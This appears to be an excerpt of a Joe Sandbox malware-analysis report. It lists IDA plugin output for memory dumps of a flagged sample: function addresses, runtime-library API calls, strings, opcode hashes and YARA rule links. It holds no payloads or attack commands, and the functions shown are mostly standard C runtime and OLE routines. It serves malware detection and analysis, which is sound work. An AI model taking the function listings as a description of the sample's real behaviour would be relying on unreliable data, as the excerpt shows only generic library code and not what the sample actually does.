Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: e057a9fe33dd00cdbcaeabad0819e259db8d9097d85f50e3f00bddb6636d5289
Instruction ID: 40c09e4ed37f56d68f77c7cd016391542d0d55449ca3496cc46082a5b15b4fdd
Opcode Fuzzy Hash: e057a9fe33dd00cdbcaeabad0819e259db8d9097d85f50e3f00bddb6636d5289
Instruction Fuzzy Hash: 1B41FDB2A042044BC704CE68DC8196BB7F6EFD4314F2D862CE859D7B44EA74ED06C7A2

Function 6CE94D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE94DA9

Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF913A
Part of subcall function 6CEF9125: __CxxThrowException@8.LIBCMT ref: 6CEF914F
Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF9160

std::_Xinvalid_argument.LIBCPMT ref: 6CE94DCA
std::_Xinvalid_argument.LIBCPMT ref: 6CE94DE5
_memmove.LIBCMT ref: 6CE94E4D

Strings

invalid string position, xrefs: 6CE94DA4
string too long, xrefs: 6CE94DC5, 6CE94DE0

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 2217e2e146ad4c2b5710d38713b731cb411cb819fba3b8a63fd869f9b2345f83
Instruction ID: 7ae6e331e96988f306a40eef9e3bbaa5905561e443daf88d2ca3c63abed28e24
Opcode Fuzzy Hash: 2217e2e146ad4c2b5710d38713b731cb411cb819fba3b8a63fd869f9b2345f83
Instruction Fuzzy Hash: 0531C5323042148FD3258E6CE880AAAF3F5AB91728B304A2FE572CFB40D771D844C791

Function 6CF044E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6CF04532
DName::operator+.LIBCMT ref: 6CF04539
DName::DName.LIBCMT ref: 6CF0455B
DName::operator+.LIBCMT ref: 6CF04562
DName::operator+.LIBCMT ref: 6CF04569

Strings

throw(, xrefs: 6CF0452A, 6CF04553

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: c7863ca4ac8b33449650d0fb7fd2dc8ccf9cb745774eab3c36292d3efb5df460
Instruction ID: cb8a7ab42383db1b352e119e6b2bc66161cc58b4d6eb72728aaa0e85af2839a0
Opcode Fuzzy Hash: c7863ca4ac8b33449650d0fb7fd2dc8ccf9cb745774eab3c36292d3efb5df460
Instruction Fuzzy Hash: CE0192B4B00109AFCF04DBA4C861DFE7BB9EB44B08F004155E905AB7A4DB70E94A9B90

Function 6CEFCCF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 6CEFCCFA

Part of subcall function 6CEFEA6D: GetLastError.KERNEL32(?,?,6CEFD7DD,6CEF9DEF,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEFEA71
Part of subcall function 6CEFEA6D: ___set_flsgetvalue.LIBCMT ref: 6CEFEA7F
Part of subcall function 6CEFEA6D: __calloc_crt.LIBCMT ref: 6CEFEA93
Part of subcall function 6CEFEA6D: DecodePointer.KERNEL32(00000000,?,?,6CEFD7DD,6CEF9DEF,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEFEAAD
Part of subcall function 6CEFEA6D: GetCurrentThreadId.KERNEL32 ref: 6CEFEAC3
Part of subcall function 6CEFEA6D: SetLastError.KERNEL32(00000000,?,?,6CEFD7DD,6CEF9DEF,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEFEADB

__calloc_crt.LIBCMT ref: 6CEFCD1C
__get_sys_err_msg.LIBCMT ref: 6CEFCD3A
_strcpy_s.LIBCMT ref: 6CEFCD42
__invoke_watson.LIBCMT ref: 6CEFCD57

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 6CEFCD07, 6CEFCD2A

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 4ced4afbaf59c990334f675e0f947342a940d2645189f72ac35a835f08638732
Instruction ID: f0121bb679f2545d086f6e3887c0bafa6e552156e84dd780cca1174c4972e4b5
Opcode Fuzzy Hash: 4ced4afbaf59c990334f675e0f947342a940d2645189f72ac35a835f08638732
Instruction Fuzzy Hash: 68F0907274823427D330396A5C8099E7ABD9B8676CB39093EF57897F00EA22994741A5

Function 6CEFE9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CF29880,00000008,6CEFEAC1,00000000,00000000,?,?,6CEFD7DD,6CEF9DEF,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEFE9CA
__lock.LIBCMT ref: 6CEFE9FE

Part of subcall function 6CF02438: __mtinitlocknum.LIBCMT ref: 6CF0244E
Part of subcall function 6CF02438: __amsg_exit.LIBCMT ref: 6CF0245A
Part of subcall function 6CF02438: EnterCriticalSection.KERNEL32(6CEF9BD4,6CEF9BD4,?,6CEFEA03,0000000D), ref: 6CF02462

InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6CEFEA0B
__lock.LIBCMT ref: 6CEFEA1F
___addlocaleref.LIBCMT ref: 6CEFEA3D

Strings

KERNEL32.DLL, xrefs: 6CEFE9C5

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: b1db16ab67c6a5ad631fd97bcc79167c178b7405ebc3c964589d190826d2d191
Instruction ID: 96fa69e7dbec88cc8c93e59a9a73040cd1e6032a8d245135726de794b1903a5c
Opcode Fuzzy Hash: b1db16ab67c6a5ad631fd97bcc79167c178b7405ebc3c964589d190826d2d191
Instruction Fuzzy Hash: F601AD71904B00EFD7209F66C405389FBF0BF41329F20890DD4AA93BA0CB74AA09CB61

Function 6CEB8A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 60ffb48540661dde96fb2d8ea5f92d13aa58d6aa58385b16feabba6237411fd2
Instruction ID: acb39b8a98569e78aba845f82d1781bee1d809d3dac0dbaa13126413ef0d916b
Opcode Fuzzy Hash: 60ffb48540661dde96fb2d8ea5f92d13aa58d6aa58385b16feabba6237411fd2
Instruction Fuzzy Hash: 8B414F74A016059FCB10DFA9CD80A6AB7F9AF89308F30858AE515EB755D731EC41CF50

Function 6CEB8DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7cda8d0bb9671116791401f9dcf41a66102c8f056657856fe9cd4710e6c754cf
Instruction ID: 0a603004921da7707c125b71bc5b07952624082183bc3ed12f197671cca125c4
Opcode Fuzzy Hash: 7cda8d0bb9671116791401f9dcf41a66102c8f056657856fe9cd4710e6c754cf
Instruction Fuzzy Hash: 72415E70A016189FDB00CF68CD80FAEB7B9AF89208F70859AE518EB751D731E981CF50

Function 6CEB0338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7cda8d0bb9671116791401f9dcf41a66102c8f056657856fe9cd4710e6c754cf
Instruction ID: cf176820cd04a46bdf57220b60d9084b1370057e55648b45fe8d9f693cec0234
Opcode Fuzzy Hash: 7cda8d0bb9671116791401f9dcf41a66102c8f056657856fe9cd4710e6c754cf
Instruction Fuzzy Hash: 1D414CB0A016089FDB00CF69CE84BADB7B9AF89204F34859AE518EB751C731E941CF50

Function 6CEB8CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 2b82e12a8e16e28b7374e29514d761b911c8263329d9792503978767ac36c267
Instruction ID: ded9693aab31f37dad1d8689e69eef732b552db7ef4d7f0cdf0ecd664834bc9f
Opcode Fuzzy Hash: 2b82e12a8e16e28b7374e29514d761b911c8263329d9792503978767ac36c267
Instruction Fuzzy Hash: 33313E70E016089FCB10CF69CD80BAEB7B9AF89208F70869AE419E7755D771E981CF50

Function 6CEB8F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 2f73cf9dd5b4ddcc9e4e2c554bc64df1fb65606304eb685381c14c70c2cfa711
Instruction ID: dbbf2a439c77a6cbf199658053bb4b96deb103f5d8ee32792f0d3ad15b211d60
Opcode Fuzzy Hash: 2f73cf9dd5b4ddcc9e4e2c554bc64df1fb65606304eb685381c14c70c2cfa711
Instruction Fuzzy Hash: B3313B70E016089FCB10CFA9CD80B6EB7B9AF89208F30858AE519E7751D775E981CF50

Function 6CEB8BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 0d250f79539a7817b6e3af1f9794423373cd1cfbcca04f429bbf4c4630b6dec3
Instruction ID: 00b348de224b4bb6edb75f54179e5ffb6fa8852c4eab6f5ac2ab4209799c49d5
Opcode Fuzzy Hash: 0d250f79539a7817b6e3af1f9794423373cd1cfbcca04f429bbf4c4630b6dec3
Instruction Fuzzy Hash: FC312770E016089FDB10DFA8C980BAEB7B9AF89208F30859AE419E7755D775ED81CF50

Function 6CEB04D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 2f73cf9dd5b4ddcc9e4e2c554bc64df1fb65606304eb685381c14c70c2cfa711
Instruction ID: 986b3089920354a4daf8a629165f34a29aacb692a489294c26aa64c53a4ceeaf
Opcode Fuzzy Hash: 2f73cf9dd5b4ddcc9e4e2c554bc64df1fb65606304eb685381c14c70c2cfa711
Instruction Fuzzy Hash: 76314DB0A016089FCB00CF69CE84BAEB7B9AF99308F30859AE518E7751C775E9418F50

Function 6CEB05DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 367cad6ee9af4f116112654b6512c5221d3d9313b525f9fde974d75d850bc6b9
Instruction ID: 95b802194f621a36f435a99aedf912a943d4ad3a2699e4e33a8e7c2630c7356c
Opcode Fuzzy Hash: 367cad6ee9af4f116112654b6512c5221d3d9313b525f9fde974d75d850bc6b9
Instruction Fuzzy Hash: CC314AB0A016099FCB00CF69CE84B6DB7B9AF99208F30859AE418EB751D775E9418F50

Function 6CEB0668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

